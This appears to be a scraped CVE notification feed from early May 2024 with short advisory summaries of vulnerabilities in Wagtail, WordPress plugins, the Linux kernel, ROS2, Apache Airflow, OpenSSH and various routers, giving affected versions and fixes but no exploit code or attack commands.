🚨 CVE-2024-32882Wagtail is an open source content management system built on Django. In affected versions if a model has been made available for editing through the `wagtail.contrib.settings` module or `ModelViewSet`, and the `permission` argument on `FieldPanel` has been used to further restrict access to one or more fields of the model, a user with edit permission over the model but not the specific field can craft an HTTP POST request that bypasses the permission check on the individual field, allowing them to update its value. This vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin, or by a user who has not been granted edit access to the model in question. The editing interfaces for pages and snippets are also unaffected. Patched versions have been released as Wagtail 6.0.3 and 6.1. Wagtail releases prior to 6.0 are unaffected. Users are advised to upgrade. Site owners who are unable to upgrade to a patched version can avoid the vulnerability as follows: 1.For models registered through `ModelViewSet`, register the model as a snippet instead; 2. For settings models, place the restricted fields in a separate settings model, and configure permission at the model level.🎖@cveNotify |
|
| 2024-05-02 06:37:31 |
🚨 CVE-2024-3478The Herd Effects WordPress plugin before 5.2.7 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting effects via CSRF attacks🎖@cveNotify |
|
| 2024-05-02 06:37:30 |
🚨 CVE-2024-3476The Side Menu Lite WordPress plugin before 4.2.1 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks🎖@cveNotify |
|
| 2024-05-02 06:37:26 |
🚨 CVE-2024-3474The Wow Skype Buttons WordPress plugin before 4.0.4 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks🎖@cveNotify |
|
| 2024-05-02 06:37:25 |
🚨 CVE-2024-3471The Button Generator WordPress plugin before 3.0 does not have CSRF check in place when bulk deleting, which could allow attackers to make a logged in admin delete buttons via a CSRF attack🎖@cveNotify |
|
| 2024-05-02 06:37:24 |
🚨 CVE-2024-2405The Float menu WordPress plugin before 6.0.1 does not have CSRF check in its bulk actions, which could allow attackers to make logged in admin delete arbitrary menu via a CSRF attack.🎖@cveNotify |
|
| 2024-05-02 03:37:26 |
🚨 CVE-2023-26130Versions of the package yhirose/cpp-httplib before 0.12.4 are vulnerable to CRLF Injection when untrusted user input is used to set the content-type header in the HTTP .Patch, .Post, .Put and .Delete requests. This can lead to logical errors and other misbehaviors.**Note:** This issue is present due to an incomplete fix for [CVE-2020-11709](https://security.snyk.io/vuln/SNYK-UNMANAGED-YHIROSECPPHTTPLIB-2366507).🎖@cveNotify |
|
| 2024-05-02 03:37:25 |
🚨 CVE-2022-48257In Eternal Terminal 6.2.1, etserver and etclient have predictable logfile names in /tmp.🎖@cveNotify |
|
| 2024-05-02 01:07:24 |
🚨 CVE-2023-7028An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.🎖@cveNotify |
|
| 2024-05-02 00:37:32 |
🚨 CVE-2023-51631D-Link DIR-X3260 prog.cgi SetUsersSettings Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-X3260 routers. Authentication is required to exploit this vulnerability.The specific flaw exists within the prog.cgi binary, which handles HNAP requests made to the lighttpd webserver listening on TCP ports 80 and 443. The issue results from the lack of proper validation of a user-supplied string before copying it to a fixed-size stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-21675.🎖@cveNotify |
|
| 2024-05-01 21:37:24 |
🚨 CVE-2024-4142An Improper input validation vulnerability that could potentially lead to privilege escalation was discovered in JFrog Artifactory.Due to this vulnerability, users with low privileges may gain administrative access to the system.This issue can also be exploited in Artifactory platforms with anonymous access enabled.🎖@cveNotify |
|
| 2024-05-01 20:07:43 |
🚨 CVE-2024-27030In the Linux kernel, the following vulnerability has been resolved:octeontx2-af: Use separate handlers for interruptsFor PF to AF interrupt vector and VF to AF vector sameinterrupt handler is registered which is causing race condition.When two interrupts are raised to two CPUs at same timethen two cores serve same event corrupting the data.🎖@cveNotify |
|
| 2024-05-01 20:07:42 |
🚨 CVE-2024-27028In the Linux kernel, the following vulnerability has been resolved:spi: spi-mt65xx: Fix NULL pointer access in interrupt handlerThe TX buffer in spi_transfer can be a NULL pointer, so the interrupthandler may end up writing to the invalid memory and cause crashes.Add a check to trans->tx_buf before using it.🎖@cveNotify |
|
| 2024-05-01 20:07:37 |
🚨 CVE-2024-27026In the Linux kernel, the following vulnerability has been resolved:vmxnet3: Fix missing reserved tailroomUse rbi->len instead of rcd->len for non-dataring packet.Found issue: XDP_WARN: xdp_update_frame_from_buff(line:278): Driver BUG: missing reserved tailroom WARNING: CPU: 0 PID: 0 at net/core/xdp.c:586 xdp_warn+0xf/0x20 CPU: 0 PID: 0 Comm: swapper/0 Tainted: G W O 6.5.1 #1 RIP: 0010:xdp_warn+0xf/0x20 ... ? xdp_warn+0xf/0x20 xdp_do_redirect+0x15f/0x1c0 vmxnet3_run_xdp+0x17a/0x400 [vmxnet3] vmxnet3_process_xdp+0xe4/0x760 [vmxnet3] ? vmxnet3_tq_tx_complete.isra.0+0x21e/0x2c0 [vmxnet3] vmxnet3_rq_rx_complete+0x7ad/0x1120 [vmxnet3] vmxnet3_poll_rx_only+0x2d/0xa0 [vmxnet3] __napi_poll+0x20/0x180 net_rx_action+0x177/0x390🎖@cveNotify |
|
| 2024-05-01 20:07:36 |
🚨 CVE-2024-27023In the Linux kernel, the following vulnerability has been resolved:md: Fix missing release of 'active_io' for flushsubmit_flushes atomic_set(&mddev->flush_pending, 1); rdev_for_each_rcu(rdev, mddev) atomic_inc(&mddev->flush_pending); bi->bi_end_io = md_end_flush submit_bio(bi); /* flush io is done first */ md_end_flush if (atomic_dec_and_test(&mddev->flush_pending)) percpu_ref_put(&mddev->active_io) -> active_io is not released if (atomic_dec_and_test(&mddev->flush_pending)) -> missing release of active_ioFor consequence, mddev_suspend() will wait for 'active_io' to be zeroforever.Fix this problem by releasing 'active_io' in submit_flushes() if'flush_pending' is decreased to zero.🎖@cveNotify |
|
| 2024-05-01 20:07:32 |
🚨 CVE-2024-23597Cross-site request forgery (CSRF) vulnerability exists in TvRock 0.9t8a. If a logged-in user of TVRock accesses a specially crafted page, unintended operations may be performed. Note that the developer was unreachable, therefore, users should consider stop using TvRock 0.9t8a.🎖@cveNotify |
|
| 2024-05-01 20:07:31 |
🚨 CVE-2023-52653In the Linux kernel, the following vulnerability has been resolved:SUNRPC: fix a memleak in gss_import_v2_contextThe ctx->mech_used.data allocated by kmemdup is not freed in neithergss_import_v2_context nor it only caller gss_krb5_import_sec_context,which frees ctx on error.Thus, this patch reform the last call of gss_import_v2_context to thegss_krb5_import_ctx_v2, preventing the memleak while keepping the returnformation.🎖@cveNotify |
|
| 2024-05-01 20:07:30 |
🚨 CVE-2023-52652In the Linux kernel, the following vulnerability has been resolved:NTB: fix possible name leak in ntb_register_device()If device_register() fails in ntb_register_device(), the device nameallocated by dev_set_name() should be freed. As per the comment indevice_register(), callers should use put_device() to give up thereference in the error path. So fix this by calling put_device() in theerror path so that the name can be freed in kobject_cleanup().As a result of this, put_device() in the error path ofntb_register_device() is removed and the actual error is returned.[mani: reworded commit message]🎖@cveNotify |
|
| 2024-05-01 20:07:27 |
🚨 CVE-2023-52651In the Linux kernel, the following vulnerability has been resolved:wifi: ath10k: fix NULL pointer dereference in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev()We should check whether the WMI_TLV_TAG_STRUCT_MGMT_TX_COMPL_EVENT tlv ispresent before accessing it, otherwise a null pointer deference error willoccur.🎖@cveNotify |
|
| 2024-05-01 20:07:26 |
🚨 CVE-2022-48669In the Linux kernel, the following vulnerability has been resolved:powerpc/pseries: Fix potential memleak in papr_get_attr()`buf` is allocated in papr_get_attr(), and krealloc() of `buf`could fail. We need to free the original `buf` in the case of failure.🎖@cveNotify |
|
| 2024-05-01 20:07:25 |
🚨 CVE-2022-38386IBM Cloud Pak for Security (CP4S) 1.10.0.0 through 1.10.11.0 and IBM QRadar Suite for Software 1.10.12.0 through 1.10.19.0 does not set the SameSite attribute for sensitive cookies which could allow an attacker to obtain sensitive information using man-in-the-middle techniques. IBM X-Force ID: 233778.🎖@cveNotify |
|
| 2024-05-01 19:37:43 |
🚨 CVE-2024-29735Improper Preservation of Permissions vulnerability in Apache Airflow.This issue affects Apache Airflow from 2.8.2 through 2.8.3.Airflow's local file task handler in Airflow incorrectly set permissions for all parent folders of log folder, in default configuration adding write access to Unix group of the folders. In the case Airflow is run with the root user (not recommended) it added group write permission to all folders up to the root of the filesystem.If your log files are stored in the home directory, these permission changes might impact your ability to run SSH operations after your home directory becomes group-writeable.This issue does not affect users who use or extend Airflow using Official Airflow Docker reference images ( https://hub.docker.com/r/apache/airflow/ ) - those images require to have group write permission set anyway.You are affected only if you install Airflow using local installation / virtualenv or other Docker images, but the issue has no impact if docker containers are used as intended, i.e. where Airflow components do not share containers with other applications and users.Also you should not be affected if your umask is 002 (group write enabled) - this is the default on many linux systems.Recommendation for users using Airflow outside of the containers: * if you are using root to run Airflow, change your Airflow user to use non-root * upgrade Apache Airflow to 2.8.4 or above * If you prefer not to upgrade, you can change the https://airflow.apache.org/docs/apache-airflow/stable/configurations-ref.html#file-task-handler-new-folder-permissions to 0o755 (original value 0o775). * if you already ran Airflow tasks before and your default umask is 022 (group write disabled) you should stop Airflow components, check permissions of AIRFLOW_HOME/logs in all your components and all parent directories of this directory and remove group write access for all the parent directories🎖@cveNotify |
|
| 2024-05-01 19:37:42 |
🚨 CVE-2024-29440An unauthorized access vulnerability has been discovered in ROS2 Humble Hawksbill versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could potentially allow a malicious user to gain unauthorized access to multiple ROS2 nodes remotely. Unauthorized access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 19:37:41 |
🚨 CVE-2024-28746Apache Airflow, versions 2.8.0 through 2.8.2, has a vulnerability that allows an authenticated user with limited permissions to access resources such as variables, connections, etc from the UI which they do not have permission to access. Users of Apache Airflow are recommended to upgrade to version 2.8.3 or newer to mitigate the risk associated with this vulnerability🎖@cveNotify |
|
| 2024-05-01 19:37:37 |
🚨 CVE-2024-25082Splinefont in FontForge through 20230101 allows command injection via crafted archives or compressed files.🎖@cveNotify |
|
| 2024-05-01 19:37:36 |
🚨 CVE-2023-51202OS command injection vulnerability in command processing or system call componentsROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary commands. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 19:37:32 |
🚨 CVE-2023-51198An issue in the permission and access control components within ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to gain escalate privileges. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 19:37:31 |
🚨 CVE-2023-51201Cleartext Transmission issue in ROS2 (Robot Operating System 2) Foxy Fitzroy, with ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to access sensitive information via a man-in-the-middle attack. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 19:37:30 |
🚨 CVE-2023-51199Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 19:37:26 |
🚨 CVE-2023-33567An unauthorized access vulnerability has been discovered in ROS2 Foxy Fitzroy versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could potentially allow a malicious user to gain unauthorized access to multiple ROS2 nodes remotely. Unauthorized access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 19:37:25 |
🚨 CVE-2023-33565ROS2 (Robot Operating System 2) Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 are vulnerable to Denial-of-Service (DoS) attacks. A malicious user potentially exploited the vulnerability remotely and crashed the ROS2 nodes. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 18:37:43 |
🚨 CVE-2023-51208An Arbitrary File Upload vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code and cause other impacts via upload of crafted file. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 18:37:42 |
🚨 CVE-2023-51199Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 18:37:38 |
🚨 CVE-2024-0582A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-05-01 18:37:37 |
🚨 CVE-2023-6129Issue summary: The POLY1305 MAC (message authentication code) implementationcontains a bug that might corrupt the internal state of applications runningon PowerPC CPU based platforms if the CPU provides vector instructions.Impact summary: If an attacker can influence whether the POLY1305 MACalgorithm is used, the application state might be corrupted with variousapplication dependent consequences.The POLY1305 MAC (message authentication code) implementation in OpenSSL forPowerPC CPUs restores the contents of vector registers in a different orderthan they are saved. Thus the contents of some of these vector registersare corrupted when returning to the caller. The vulnerable code is used onlyon newer PowerPC processors supporting the PowerISA 2.07 instructions.The consequences of this kind of internal application state corruption canbe various - from no consequences, if the calling application does notdepend on the contents of non-volatile XMM registers at all, to the worstconsequences, where the attacker could get complete control of the applicationprocess. However unless the compiler uses the vector registers for storingpointers, the most likely consequence, if any, would be an incorrect resultof some application dependent calculations or a crash leading to a denial ofservice.The POLY1305 MAC algorithm is most frequently used as part of theCHACHA20-POLY1305 AEAD (authenticated encryption with associated data)algorithm. The most common usage of this AEAD cipher is with TLS protocolversions 1.2 and 1.3. If this cipher is enabled on the server a maliciousclient can influence whether this AEAD cipher is used. This implies thatTLS server applications using OpenSSL can be potentially impacted. Howeverwe are currently not aware of any concrete application that would be affectedby this issue therefore we consider this a Low severity security issue.🎖@cveNotify |
|
| 2024-05-01 18:37:36 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-05-01 18:37:33 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2024-05-01 18:37:32 |
🚨 CVE-2023-46288Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Airflow.This issue affects Apache Airflow from 2.4.0 to 2.7.0.Sensitive configuration information has been exposed to authenticated users with the ability to read configuration via Airflow REST API for configuration even when the expose_config option is set to non-sensitive-only. The expose_config option is False by default. It is recommended to upgrade to a version that is not affected if you set expose_config to non-sensitive-only configuration. This is a different error than CVE-2023-45348 which allows authenticated user to retrieve individual configuration values in 2.7.* by specially crafting their request (solved in 2.7.2).Users are recommended to upgrade to version 2.7.2, which fixes the issue and additionally fixes CVE-2023-45348.🎖@cveNotify |
|
| 2024-05-01 18:37:31 |
🚨 CVE-2023-33566An unauthorized node injection vulnerability has been identified in ROS2 Foxy Fitzroy versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could allow a malicious user to inject malicious ROS2 nodes into the system remotely. Once injected, these nodes could disrupt the normal operations of the system or cause other potentially harmful behavior. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 18:37:27 |
🚨 CVE-2023-2598A flaw was found in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) in the Linux kernel that allows out-of-bounds access to physical memory beyond the end of the buffer. This flaw enables full local privilege escalation.🎖@cveNotify |
|
| 2024-05-01 18:37:26 |
🚨 CVE-2020-11974In DolphinScheduler 1.2.0 and 1.2.1, with mysql connectorj a remote code execution vulnerability exists when choosing mysql as database.🎖@cveNotify |
|
| 2024-05-01 18:37:25 |
🚨 CVE-2013-4407HTTP::Body::Multipart in the HTTP-Body module for Perl (1.07 through 1.22, before 1.23) uses the part of the uploaded file's name after the first "." character as the suffix of a temporary file, which makes it easier for remote attackers to conduct attacks by leveraging subsequent behavior that may assume the suffix is well-formed.🎖@cveNotify |
|
| 2024-05-01 17:37:43 |
🚨 CVE-2024-27138** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva.Apache Archiva has a setting to disable user registration, however this restriction can be bypassed. As Apache Archiva has been retired, we do not expect to release a version of Apache Archiva that fixes this issue. You are recommended to look into migrating to a different solution, or isolate your instance from any untrusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-05-01 17:37:42 |
🚨 CVE-2023-51198An issue in the permission and access control components within ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to gain escalate privileges. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 17:37:38 |
🚨 CVE-2023-51208An Arbitrary File Upload vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code and cause other impacts via upload of crafted file. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 17:37:37 |
🚨 CVE-2023-51199Buffer Overflow vulnerability in ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows attackers to run arbitrary code or cause a denial of service via improper handling of arrays or strings. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 17:37:36 |
🚨 CVE-2023-51200An issue in the default configurations of ROS2 Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 allows unauthenticated attackers to authenticate using default credentials. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 17:37:33 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-05-01 17:37:32 |
🚨 CVE-2023-43665In Django 3.2 before 3.2.22, 4.1 before 4.1.12, and 4.2 before 4.2.6, the django.utils.text.Truncator chars() and words() methods (when used with html=True) are subject to a potential DoS (denial of service) attack via certain inputs with very long, potentially malformed HTML text. The chars() and words() methods are used to implement the truncatechars_html and truncatewords_html template filters, which are thus also vulnerable. NOTE: this issue exists because of an incomplete fix for CVE-2019-14232.🎖@cveNotify |
|
| 2024-05-01 17:37:31 |
🚨 CVE-2023-33566An unauthorized node injection vulnerability has been identified in ROS2 Foxy Fitzroy versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could allow a malicious user to inject malicious ROS2 nodes into the system remotely. Once injected, these nodes could disrupt the normal operations of the system or cause other potentially harmful behavior. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-05-01 17:37:27 |
🚨 CVE-2022-31629In PHP versions before 7.4.31, 8.0.24 and 8.1.11, the vulnerability enables network and same-site attackers to set a standard insecure cookie in the victim's browser which is treated as a `__Host-` or `__Secure-` cookie by PHP applications.🎖@cveNotify |
|
| 2024-05-01 17:37:26 |
🚨 CVE-2016-3739The (1) mbed_connect_step1 function in lib/vtls/mbedtls.c and (2) polarssl_connect_step1 function in lib/vtls/polarssl.c in cURL and libcurl before 7.49.0, when using SSLv3 or making a TLS connection to a URL that uses a numerical IP address, allow remote attackers to spoof servers via an arbitrary valid certificate.🎖@cveNotify |
|
| 2024-05-01 16:37:30 |
🚨 CVE-2024-33820Totolink AC1200 Wireless Dual Band Gigabit Router A3002R_V4 Firmware V4.0.0-B20230531.1404 is vulnerable to Buffer Overflow via the formWlEncrypt function of the boa server. Specifically, they exploit the length of the wlan_ssid field triggers the overflow.🎖@cveNotify |
|
| 2024-05-01 15:37:26 |
🚨 CVE-2024-33512There is a buffer overflow vulnerability in the underlying Local User Authentication Database service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-01 15:37:25 |
🚨 CVE-2024-26305There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-01 15:37:24 |
🚨 CVE-2024-26304There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-05-01 14:37:24 |
🚨 CVE-2024-24912A local privilege escalation vulnerability has been identified in Harmony Endpoint Security Client for Windows versions E88.10 and below. To exploit this vulnerability, an attacker must first obtain the ability to execute local privileged code on the target system.🎖@cveNotify |
|
| 2024-05-01 13:37:43 |
🚨 CVE-2024-27029In the Linux kernel, the following vulnerability has been resolved:drm/amdgpu: fix mmhub client id out-of-bounds accessProperly handle cid 0x140.🎖@cveNotify |
|
| 2024-05-01 13:37:42 |
🚨 CVE-2024-27028In the Linux kernel, the following vulnerability has been resolved:spi: spi-mt65xx: Fix NULL pointer access in interrupt handlerThe TX buffer in spi_transfer can be a NULL pointer, so the interrupthandler may end up writing to the invalid memory and cause crashes.Add a check to trans->tx_buf before using it.🎖@cveNotify |
|
| 2024-05-01 13:37:39 |
🚨 CVE-2024-27027In the Linux kernel, the following vulnerability has been resolved:dpll: fix dpll_xa_ref_*_del() for multiple registrationsCurrently, if there are multiple registrations of the same pin on thesame dpll device, following warnings are observed:WARNING: CPU: 5 PID: 2212 at drivers/dpll/dpll_core.c:143 dpll_xa_ref_pin_del.isra.0+0x21e/0x230WARNING: CPU: 5 PID: 2212 at drivers/dpll/dpll_core.c:223 __dpll_pin_unregister+0x2b3/0x2c0The problem is, that in both dpll_xa_ref_dpll_del() anddpll_xa_ref_pin_del() registration is only removed from list in case thereference count drops to zero. That is wrong, the registration has tobe removed always.To fix this, remove the registration from the list and freeit unconditionally, instead of doing it only when the ref referencecounter reaches zero.🎖@cveNotify |
|
| 2024-05-01 13:37:38 |
🚨 CVE-2024-27025In the Linux kernel, the following vulnerability has been resolved:nbd: null check for nla_nest_startnla_nest_start() may fail and return NULL. Insert a check and set errnobased on other call sites within the same source code.🎖@cveNotify |
|
| 2024-05-01 13:37:37 |
🚨 CVE-2024-27023In the Linux kernel, the following vulnerability has been resolved:md: Fix missing release of 'active_io' for flushsubmit_flushes atomic_set(&mddev->flush_pending, 1); rdev_for_each_rcu(rdev, mddev) atomic_inc(&mddev->flush_pending); bi->bi_end_io = md_end_flush submit_bio(bi); /* flush io is done first */ md_end_flush if (atomic_dec_and_test(&mddev->flush_pending)) percpu_ref_put(&mddev->active_io) -> active_io is not released if (atomic_dec_and_test(&mddev->flush_pending)) -> missing release of active_ioFor consequence, mddev_suspend() will wait for 'active_io' to be zeroforever.Fix this problem by releasing 'active_io' in submit_flushes() if'flush_pending' is decreased to zero.🎖@cveNotify |
|
| 2024-05-01 13:37:33 |
🚨 CVE-2024-24978Denial-of-service (DoS) vulnerability exists in TvRock 0.9t8a. Receiving a specially crafted request by a remote attacker or having a user of TvRock click a specially crafted request may lead to ABEND (abnormal end). Note that the developer was unreachable, therefore, users should consider stop using TvRock 0.9t8a.🎖@cveNotify |
|
| 2024-05-01 13:37:32 |
🚨 CVE-2024-0334The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom attribute of a link in several Elementor widgets in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-01 13:37:31 |
🚨 CVE-2023-52652In the Linux kernel, the following vulnerability has been resolved:NTB: fix possible name leak in ntb_register_device()If device_register() fails in ntb_register_device(), the device nameallocated by dev_set_name() should be freed. As per the comment indevice_register(), callers should use put_device() to give up thereference in the error path. So fix this by calling put_device() in theerror path so that the name can be freed in kobject_cleanup().As a result of this, put_device() in the error path ofntb_register_device() is removed and the actual error is returned.[mani: reworded commit message]🎖@cveNotify |
|
| 2024-05-01 13:37:27 |
🚨 CVE-2023-52651In the Linux kernel, the following vulnerability has been resolved:wifi: ath10k: fix NULL pointer dereference in ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev()We should check whether the WMI_TLV_TAG_STRUCT_MGMT_TX_COMPL_EVENT tlv ispresent before accessing it, otherwise a null pointer deference error willoccur.🎖@cveNotify |
|
| 2024-05-01 13:37:26 |
🚨 CVE-2023-52649In the Linux kernel, the following vulnerability has been resolved:drm/vkms: Avoid reading beyond LUT arrayWhen the floor LUT index (drm_fixp2int(lut_index) is the lastindex of the array the ceil LUT index will point to an entrybeyond the array. Make sure we guard against it and use thevalue of the floor LUT index.v3: - Drop bits from commit description that didn't contribute anything of value🎖@cveNotify |
|
| 2024-05-01 13:37:25 |
🚨 CVE-2022-38386IBM Cloud Pak for Security (CP4S) 1.10.0.0 through 1.10.11.0 and IBM QRadar Suite for Software 1.10.12.0 through 1.10.19.0 does not set the SameSite attribute for sensitive cookies which could allow an attacker to obtain sensitive information using man-in-the-middle techniques. IBM X-Force ID: 233778.🎖@cveNotify |
|
| 2024-05-01 13:07:32 |
🚨 CVE-2024-29466Directory Traversal vulnerability in lsgwr spring boot online exam v.0.9 allows an attacker to execute arbitrary code via the FileTransUtil.java component.🎖@cveNotify |
|
| 2024-05-01 11:37:27 |
🚨 CVE-2024-33835Tenda AC18 V15.03.05.05 has a stack overflow vulnerability in the remoteIp parameter from formSetSafeWanWebMan function.🎖@cveNotify |
|
| 2024-05-01 11:37:26 |
